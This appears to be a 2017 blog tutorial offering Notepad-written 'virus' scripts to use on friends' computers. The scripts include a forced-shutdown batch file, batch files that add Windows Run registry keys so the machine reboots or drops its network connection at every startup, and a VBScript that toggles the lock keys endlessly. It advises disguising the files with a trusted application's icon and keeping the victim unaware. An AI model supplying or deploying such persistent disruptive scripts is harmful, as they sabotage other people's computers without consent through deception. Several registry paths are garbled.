Saturday, April 22, 2017

Simple Virus Script With Notepad

Script to create a Simple Computer Virus


Who do not know the danger of computer virus? Surely you all know the danger of viruses like this but this time I will provide a simple safe kompiter virus and do not damage your computer. Suitable for those who like ignorant to friends.
1. Creating Shutdown Virus.

The workings of this simple computer virus is to force a friend's computer or target so Shutdown. Please open Notepad, and copy and paste the code below. Then save the file with the name ForceShutdown.bat and its file type All files.

@echo off
msg * I don't like you
shutdown -c "Error! Automatic Shutdown!" -s

To activate this virus, you must click on the file. So, automatically this virus 
will run and do not let your friends know it. 

2. Force Shutdown Every Time Turned on
 
Unlike previous viruses, this simple virus will force your friend's computer to Shutdown every time it is turned on. So be careful when you want to use it if not you yourself will receive the consequences.
 
Unlike previous viruses, this simple virus will force your friend's computer to Shutdown every time it is turned on. So be careful when you want to use it if not you yourself will receive the consequences.
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE
 
After you copy it save it in notepad by changing it to .bat format then click for the virus can run automatically.

3. Turning off the Internet Permanently

While on an internet network, would be upset if there are people who download instead? Make the internet slow due to reduced bandwidth quickly. So, try to turn off your friends internet using the following simple virus script :

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save it with the name you want and use the .bat extension. Then click to activate it !

4. Sucks Virus

Who said only young people who doang cantang menyeblkan? Your computer can also be annoying if inspected alay keyboard virus. Well, to make a computer virus that will make the keyboard so annoying, you can use the following script :
 

 
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wscript.sleep 100
wshshell.sendkeys "{NUMLOCK}"
wscript.sleep 100
wshshell.sendkeys "{SCROLLLOCK}"
loop

The same way, copy and paste the code above into Notepad. Then save with sucks.vbs and All file type.

In order to run smoothly, try to save a simple computer virus file that you created on the target computer. Then put the file on the desktop, and do not forget to change the icon shortcut it so favorite application target. So enjoy it and be careful. 
 


 

0 comments:

Post a Comment